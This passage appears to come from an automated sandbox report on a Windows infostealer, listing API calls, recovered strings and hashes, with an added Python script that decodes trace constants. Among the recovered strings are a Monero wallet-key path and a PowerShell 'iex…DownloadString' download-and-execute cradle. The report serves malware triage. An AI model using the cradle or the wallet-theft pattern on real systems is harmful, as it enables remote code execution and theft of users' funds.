                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49A6C
                            • CloseHandle.KERNEL32(00000000), ref: 00F49A79
                            • CloseHandle.KERNEL32(00F3A056), ref: 00F49A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: 88cd0d8c5fe84b3638317200801b1f7cb56b1667bd583a91aa24bccda50a5d6c
                            • Instruction ID: 665a5cc037deb3c3f769bd962fc816cb9b499bd490501d619cdf3819be4df490
                            • Opcode Fuzzy Hash: 88cd0d8c5fe84b3638317200801b1f7cb56b1667bd583a91aa24bccda50a5d6c
                            • Instruction Fuzzy Hash: C621CF75A04218DFDF35DFA1D889BDEBBB5BB48304F1041C8E909A6284D774AE84DF50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F4783B
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BB28,00000000,00020119,00000000), ref: 00F4786D
                            • RegQueryValueExA.ADVAPI32(00000000,0098DB18,00000000,00000000,?,000000FF), ref: 00F4788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F47898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 939680b0b2fdefb4beaf20ecf342ca5a2134db391a9a61cdff5235c39d8c7069
                            • Instruction ID: 631a792d9af9c201431e3041acc198d6de38bc77ae4d0a78d9a2b48fdf25c40f
                            • Opcode Fuzzy Hash: 939680b0b2fdefb4beaf20ecf342ca5a2134db391a9a61cdff5235c39d8c7069
                            • Instruction Fuzzy Hash: 6601FF75A44305BFEB10EBE4ED8DF6EBB78EB48701F104194FA45A6286D770A940DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F478C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F478CB
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BB28,00000000,00020119,00F47849), ref: 00F478EB
                            • RegQueryValueExA.ADVAPI32(00F47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F4790A
                            • RegCloseKey.ADVAPI32(00F47849), ref: 00F47914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 53c0eea6ae00439880f0daf7fc17b22da14a912becc28f71272cbdd19783cd20
                            • Instruction ID: 3778f92b1e784761ec41cd4520d209e5ca25618394c0187009342c0975369fad
                            • Opcode Fuzzy Hash: 53c0eea6ae00439880f0daf7fc17b22da14a912becc28f71272cbdd19783cd20
                            • Instruction Fuzzy Hash: BA0167B5A40309BFEB10DBE4EC4DFAEB778EB04700F004594FA05A7285D7746A00DBA0
                            APIs
                            • memset.MSVCRT ref: 00F44325
                            • RegOpenKeyExA.ADVAPI32(80000001,0098D538,00000000,00020119,?), ref: 00F44344
                            • RegQueryValueExA.ADVAPI32(?,0098DE60,00000000,00000000,00000000,000000FF), ref: 00F44368
                            • RegCloseKey.ADVAPI32(?), ref: 00F44372
                            • lstrcat.KERNEL32(?,00000000), ref: 00F44397
                            • lstrcat.KERNEL32(?,0098DED8), ref: 00F443AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 7553392e098dfc1de2d471b1310feee921a7b23d9f09b4f14b6c419ee6fb4f4f
                            • Instruction ID: 1966b7d8328d3084ea484e10d8a1580ceb3875f6dd13322a2fe91e5e0fda2e0e
                            • Opcode Fuzzy Hash: 7553392e098dfc1de2d471b1310feee921a7b23d9f09b4f14b6c419ee6fb4f4f
                            • Instruction Fuzzy Hash: 5041BCB6900108ABDB25FBA0FC4AFEE773CBB88700F044658B71556185FB7566988BD1
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                            • ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                            • LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 02f1cb81e1df2d89dd0102e2f9b9f0982e5d0d045bc1d4b673d2cc672077b17d
                            • Instruction ID: eb8cf51a6c52c52a1220fc6285cfc59214353716b1803ed7b69e310c7871636b
                            • Opcode Fuzzy Hash: 02f1cb81e1df2d89dd0102e2f9b9f0982e5d0d045bc1d4b673d2cc672077b17d
                            • Instruction Fuzzy Hash: CA31FC74E00209EFDB14DFA5D889FAE7BB5AB48314F108158E951A7380D774AA81DFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 8317b1c7546854b67123857235255eead3ab99f36074f4fd661369ce4f17a567
                            • Instruction ID: 331836be9e72ca3c51f5fc102ba254de2eba5ea471e47c4ee2a4300d56044230
                            • Opcode Fuzzy Hash: 8317b1c7546854b67123857235255eead3ab99f36074f4fd661369ce4f17a567
                            • Instruction Fuzzy Hash: C241D7B150179C5EDB218B248DC5FFB7FE89B45704F1444E8EE8A97182E2719A44EFA0
                            APIs
                            • lstrcat.KERNEL32(?,0098DF38), ref: 00F44A2B
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F44A51
                            • lstrcat.KERNEL32(?,?), ref: 00F44A70
                            • lstrcat.KERNEL32(?,?), ref: 00F44A84
                            • lstrcat.KERNEL32(?,0097AED8), ref: 00F44A97
                            • lstrcat.KERNEL32(?,?), ref: 00F44AAB
                            • lstrcat.KERNEL32(?,0098D3F8), ref: 00F44ABF
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F20: GetFileAttributesA.KERNEL32(00000000,?,00F31B94,?,?,00F5577C,?,?,00F50E22), ref: 00F48F2F
                              • Part of subcall function 00F447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F447D0
                              • Part of subcall function 00F447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00F447D7
                              • Part of subcall function 00F447C0: wsprintfA.USER32 ref: 00F447F6
                              • Part of subcall function 00F447C0: FindFirstFileA.KERNEL32(?,?), ref: 00F4480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: f07f5abf60ce55a283fc5c1cce674668b3f7f645d473bbcb23560c9abb58be05
                            • Instruction ID: 1f75940b6a61dfb3fff720b757948701220ecbd50d4db2a48094dcd37fce9f27
                            • Opcode Fuzzy Hash: f07f5abf60ce55a283fc5c1cce674668b3f7f645d473bbcb23560c9abb58be05
                            • Instruction Fuzzy Hash: 113175B69002186BDB25FBB0DC8DEDD773CAB88700F404689B64596046DE78A7C9DB94
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F42FD5
                            Strings
                            • <, xrefs: 00F42F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F42F54
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F42F14
                            • ')", xrefs: 00F42F03
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: f16538176e02f67b6299e534675d5e59b9574ed379111d8972204f3f8189b82d
                            • Instruction ID: 22996195e1d4573bdd3f6e4470a7d5269f02d82c87d4475dc3bd490aa2b1b96d
                            • Opcode Fuzzy Hash: f16538176e02f67b6299e534675d5e59b9574ed379111d8972204f3f8189b82d
                            • Instruction Fuzzy Hash: 19412A71D402189BEB15FFA0CCA2BEDBF78AF50344F404558E90267192EF786A49DF92
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction ID: db2375e3886a8cbf253335c3d64afe022bfd1f211a3f84ac872480cb62fd5f63
                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction Fuzzy Hash: B42192F2E006A8AFDB229F55CD41A6F3A79EB83BB4F054115F8196B211C7344D41ABE0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BCE8,00000000,00020119,?), ref: 00F47FEE
                            • RegQueryValueExA.ADVAPI32(?,0098D638,00000000,00000000,000000FF,000000FF), ref: 00F4800F
                            • RegCloseKey.ADVAPI32(?), ref: 00F48022
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: a0ebf2ca8e3ab4f990062744a59ab201c47d8f5f147ad95e9a8959720d1a0da2
                            • Instruction ID: a4c2a36cde40bc079b0e836243cb60686df1473f2ae5b4b73f40b81e381e3d6b
                            • Opcode Fuzzy Hash: a0ebf2ca8e3ab4f990062744a59ab201c47d8f5f147ad95e9a8959720d1a0da2
                            • Instruction Fuzzy Hash: C21191B2A40205EFD710CF88ED49F7FBBB8EB04B10F104219FA15A7285DB7568009BA1
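The numeric arguments in the API lines above carry most of the triage value, and they are easy to misread in raw form: in the SHGetFolderPathA subcall, 0x1C is CSIDL_LOCAL_APPDATA, so the lstrcat chain that follows builds paths beneath the user's local AppData (the helper 00F4ACC0 referenced from several of these functions carries the string \Monero\wallet.keys); in the RegOpenKeyExA calls, 0x80000002 is HKEY_LOCAL_MACHINE and 0x20119 is KEY_READ | KEY_WOW64_64KEY, meaning this 32-bit sample deliberately opens the 64-bit registry view rather than the WOW64-redirected one; and the 0x3C shown for ShellExecuteEx is 60, the size of SHELLEXECUTEINFOA on x86 (the same value the disassembler listed as the string "<"). The Python below is an added example, not code from the report or from Joe Sandbox, that parses trace lines in the page's `Name.Module(args), ref: addr` form, including the `Part of subcall function` prefix, and annotates the constants it recognises. The sample lines are copied from the trace above; reading the arguments displayed for GetProcessHeap (which takes none) as stack words belonging to the RtlAllocateHeap that follows is an assumption about how the tracer renders such calls.

```python
import re
from typing import Any, Dict, List, Union

# One Joe Sandbox API-trace line as rendered on this page, for example:
#   • RegOpenKeyExA.ADVAPI32(80000002,0097BCE8,00000000,00020119,?), ref: 00F47FEE
#   • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,...), ref: 00F48F9B
#   • wsprintfA.USER32 ref: 00F447F6
_LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?$"
)

_HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
          0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

# REGSAM composites are matched greedily first, then the remaining single bits.
_REGSAM_COMPOSITE = {"KEY_ALL_ACCESS": 0xF003F, "KEY_READ": 0x20019, "KEY_WRITE": 0x20006}
_REGSAM_BITS = {
    "KEY_QUERY_VALUE": 0x0001, "KEY_SET_VALUE": 0x0002, "KEY_CREATE_SUB_KEY": 0x0004,
    "KEY_ENUMERATE_SUB_KEYS": 0x0008, "KEY_NOTIFY": 0x0010, "KEY_CREATE_LINK": 0x0020,
    "KEY_WOW64_64KEY": 0x0100, "KEY_WOW64_32KEY": 0x0200,
    "DELETE": 0x10000, "READ_CONTROL": 0x20000, "WRITE_DAC": 0x40000, "WRITE_OWNER": 0x80000,
}

_CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
          0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
          0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE"}
_CSIDL_FLAG_MASK = 0xFF00  # CSIDL_FLAG_CREATE and friends live in the high byte


def decode_regsam(mask: int) -> str:
    """Decompose a REGSAM access mask into named rights, composites first."""
    names: List[str] = []
    for name, bits in sorted(_REGSAM_COMPOSITE.items(), key=lambda kv: -bin(kv[1]).count("1")):
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
    for name, bit in _REGSAM_BITS.items():
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(f"0x{mask:X}")  # bits we do not know about
    return "|".join(names) if names else "0"


def _parse_arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None  # the tracer could not recover this value
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok  # a string the tracer resolved, e.g. a path


def annotate_trace_line(line: str) -> Dict[str, Any]:
    """Parse one API-trace line and attach notes for the constants we recognise."""
    text = line.strip().lstrip("•").strip()
    m = _LINE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised trace line: {line!r}")
    args = [_parse_arg(t) for t in m.group("args").split(",")] if m.group("args") else []
    rec: Dict[str, Any] = {"api": m.group("api"), "module": m.group("module"),
                           "subcall": m.group("sub"), "ref": m.group("ref"),
                           "args": args, "notes": []}
    api = rec["api"]

    def arg(i: int) -> Union[int, str, None]:
        return args[i] if i < len(args) else None

    if api.startswith("RegOpenKeyEx"):
        hive, sam = arg(0), arg(3)
        if isinstance(hive, int) and hive in _HIVES:
            rec["notes"].append(f"arg0 = {_HIVES[hive]}")
        if isinstance(sam, int):
            rec["notes"].append(f"arg3 = {decode_regsam(sam)}")
    elif api.startswith("SHGetFolderPath"):
        csidl = arg(1)
        if isinstance(csidl, int) and (csidl & ~_CSIDL_FLAG_MASK) in _CSIDL:
            rec["notes"].append(f"arg1 = {_CSIDL[csidl & ~_CSIDL_FLAG_MASK]}")
    elif api.startswith("ShellExecuteEx") and arg(0) == 0x3C:
        # Interpretation: the tracer shows the first dword of the SHELLEXECUTEINFO it was
        # handed; 0x3C == 60 == sizeof(SHELLEXECUTEINFOA) on 32-bit Windows.
        rec["notes"].append("arg0 = 0x3C = sizeof(SHELLEXECUTEINFOA) (x86)")
    elif api == "GetProcessHeap" and arg(1) == 0x104:
        # GetProcessHeap takes no parameters; assumption: the displayed words are the
        # caller's stack, i.e. the flags and size for the RtlAllocateHeap that follows.
        rec["notes"].append("stack word 0x104 = MAX_PATH (likely next RtlAllocateHeap size)")
    return rec


def annotate_trace(lines: List[str]) -> List[Dict[str, Any]]:
    return [annotate_trace_line(ln) for ln in lines if ln.strip()]


# Sample input: lines copied verbatim from the trace on this page.
TRACE = [
    "• Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B",
    "• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47FC7",
    "• RegOpenKeyExA.ADVAPI32(80000002,0097BCE8,00000000,00020119,?), ref: 00F47FEE",
    "• ShellExecuteEx.SHELL32(0000003C), ref: 00F42FD5",
    "• wsprintfA.USER32 ref: 00F447F6",
]

if __name__ == "__main__":
    for rec in annotate_trace(TRACE):
        print(rec["api"], rec["ref"], "; ".join(rec["notes"]))
```

Feeding the whole "APIs" section of a report through `annotate_trace` turns the access-mask and folder constants into names in one pass, which is usually enough to tell a wallet-path builder or a WOW64-aware registry read apart from benign runtime code without opening the disassembly.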
                            APIs
                            • StrStrA.SHLWAPI(0098DFB0,00000000,00000000,?,00F39F71,00000000,0098DFB0,00000000), ref: 00F493FC
                            • lstrcpyn.KERNEL32(01207580,0098DFB0,0098DFB0,?,00F39F71,00000000,0098DFB0), ref: 00F49420
                            • lstrlen.KERNEL32(00000000,?,00F39F71,00000000,0098DFB0), ref: 00F49437
                            • wsprintfA.USER32 ref: 00F49457
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: b204269efd9793c69feb07910336629024d4aeea4aeed1a7d820b763fd0332c1
                            • Instruction ID: ef5439ea6e46c5478778caddaf976a516b54603a2d1e23958bae79a8c0645be6
                            • Opcode Fuzzy Hash: b204269efd9793c69feb07910336629024d4aeea4aeed1a7d820b763fd0332c1
                            • Instruction Fuzzy Hash: CA010875600108FFCB05DFA8E948EAE7B79EB48304F108348FD499B686D631AA44DBA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F312B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F312BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F312D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F312F5
                            • RegCloseKey.ADVAPI32(?), ref: 00F312FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 26813eaebe5c6e5fdf01e39f5348a4397239b82c863194b776222613c261a7a8
                            • Instruction ID: dba3aba5772821d5fe7588ea359241e74f27f7d1d45a09b31048c7b896e37735
                            • Opcode Fuzzy Hash: 26813eaebe5c6e5fdf01e39f5348a4397239b82c863194b776222613c261a7a8
                            • Instruction Fuzzy Hash: F001E179A40209BFDB14DFD4EC89FAEB77DEB48701F104295FA4597285D770AA00DBA0
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F46903
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F469C6
                            • ExitProcess.KERNEL32 ref: 00F469F5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 6281c8894ef018fd9f9f1980c0479dd410ee514e729694bbcf972ffc14fdc9a9
                            • Instruction ID: efc016aa1e43740331b78507ed7be38b2571964dc977f86c4cde63de6257b8a1
                            • Opcode Fuzzy Hash: 6281c8894ef018fd9f9f1980c0479dd410ee514e729694bbcf972ffc14fdc9a9
                            • Instruction Fuzzy Hash: 963130B1941218ABEB15EF90DC95FDEBB78EF48300F404189F60566181DF786B48CF65
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F50E10,00000000,?), ref: 00F489BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F489C6
                            • wsprintfA.USER32 ref: 00F489E0
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 7cf85009ffb9a9f6a5aa62388654a71570e1a78414dc1db14adf9a999bb60faf
                            • Instruction ID: f4c251b024e7eaca2903e8c92d922ce233340a8cb13d7e0b54e4dda3596682e1
                            • Opcode Fuzzy Hash: 7cf85009ffb9a9f6a5aa62388654a71570e1a78414dc1db14adf9a999bb60faf
                            • Instruction Fuzzy Hash: 0A214FB1A40204EFDB10DF94ED49FAEBBB8FB48711F104219FA15A7285CB75AD00CBA1
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F3A098
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            • Opcode ID: 53e5270df896f26bbfdce47b688a85fff330cbe8faf7444e7c2cb67c8672b6ce
                            • Instruction ID: 0dd14e1e3af052d27053ebdb6f39cd0bf702c05b9d22a724b807839d9f485276
                            • Opcode Fuzzy Hash: 53e5270df896f26bbfdce47b688a85fff330cbe8faf7444e7c2cb67c8672b6ce
                            • Instruction Fuzzy Hash: ABF03078544204FFD722EB71F84CB153266F305725F005B14E58597186D3B4B888DB53
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F496AE,00000000), ref: 00F48EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F48EF2
                            • wsprintfW.USER32 ref: 00F48F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 62d46c6b60c9a69cbd7b0addf3339bd1ecad5dd28e3a064ca4fb820bcef785ba
                            • Instruction ID: a1d4a2793e491bd5e96ed34156f0627a102e637128966d2269af690127636921
                            • Opcode Fuzzy Hash: 62d46c6b60c9a69cbd7b0addf3339bd1ecad5dd28e3a064ca4fb820bcef785ba
                            • Instruction Fuzzy Hash: F0E0EC75A44309BFDB20DB94ED0EE6D77B8EB05702F000294FE4997381DA71AE109BA1
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3AA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00F3AB2F
                            • lstrlen.KERNEL32(00000000), ref: 00F3ADEC
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3AE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 6f715b978fa0614f73c88dd74517967a845cbcdb6aa764aa8f07420d97bee621
